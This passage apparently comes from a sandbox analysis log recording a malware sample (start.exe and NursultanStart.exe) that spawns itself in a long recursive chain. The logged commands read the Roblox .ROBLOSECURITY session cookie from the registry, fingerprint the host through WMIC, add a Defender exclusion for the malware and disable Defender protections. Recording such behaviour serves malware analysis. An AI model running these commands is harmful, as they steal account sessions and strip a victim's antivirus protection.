        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        364⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        364⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        365⤵
        
        PID:3480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        364⤵
        
        PID:1356
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        364⤵
        
        PID:4620
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        364⤵
        
        PID:2272
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        364⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        365⤵
        
        PID:3144
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        364⤵
        Detects videocard installed
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        363⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        364⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        364⤵
        Checks computer location settings
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        365⤵
        
        PID:1648
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        365⤵
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        366⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        366⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        367⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        367⤵
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        368⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        368⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        369⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        369⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        370⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        370⤵
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        371⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        371⤵
        
        PID:1272
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        372⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        372⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        373⤵
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        373⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        374⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        374⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        375⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        375⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        376⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        376⤵
        
        PID:2896
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        377⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        377⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        378⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        378⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        379⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        379⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        380⤵
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        380⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        381⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        381⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        382⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        382⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        383⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        383⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        384⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        384⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        385⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        385⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        386⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        386⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        387⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        387⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        388⤵
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        388⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        389⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        389⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        390⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        390⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        391⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        391⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        392⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        392⤵
        
        PID:520
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        393⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        393⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        394⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        394⤵
        
        PID:1952
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        395⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        395⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        396⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        396⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        397⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        397⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        398⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        398⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        399⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        399⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        400⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        400⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        401⤵
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        401⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        402⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        402⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        403⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        403⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        404⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        404⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        405⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        405⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        406⤵
        
        PID:1600
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        406⤵
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        407⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        407⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        408⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        408⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        409⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        409⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        410⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        410⤵
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        411⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        411⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        412⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        412⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        413⤵
        
        PID:4088
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        413⤵
        
        PID:5036
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        414⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        414⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        415⤵
        
        PID:4672
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        415⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        416⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        416⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        417⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        417⤵
        
        PID:2404
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        418⤵
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        418⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        419⤵
        
        PID:60
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        419⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        420⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        420⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        421⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        421⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        422⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        422⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        423⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        423⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        424⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        424⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        425⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        425⤵
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        426⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        426⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        427⤵
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        427⤵
        
        PID:4252
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        428⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        428⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        429⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        429⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        430⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        430⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        431⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        431⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        432⤵
        
        PID:3996
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        432⤵
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        433⤵
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        433⤵
        
        PID:1636
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        434⤵
        Drops file in Drivers directory
        
        PID:5052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe'
        435⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        435⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        436⤵
        
        PID:4268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        435⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        435⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        435⤵
        
        PID:3632
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        435⤵
        
        PID:4320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        436⤵
        
        PID:4868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        435⤵
        
        PID:4060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        436⤵
        
        PID:4812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        435⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4672
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        435⤵
        Detects videocard installed
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        434⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        435⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        435⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        436⤵
        
        PID:3588
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        436⤵
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        437⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        437⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        438⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        438⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        439⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        439⤵
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        440⤵
        
        PID:2928
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        440⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        441⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        441⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        442⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        442⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        443⤵
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        443⤵
        
        PID:3604
        
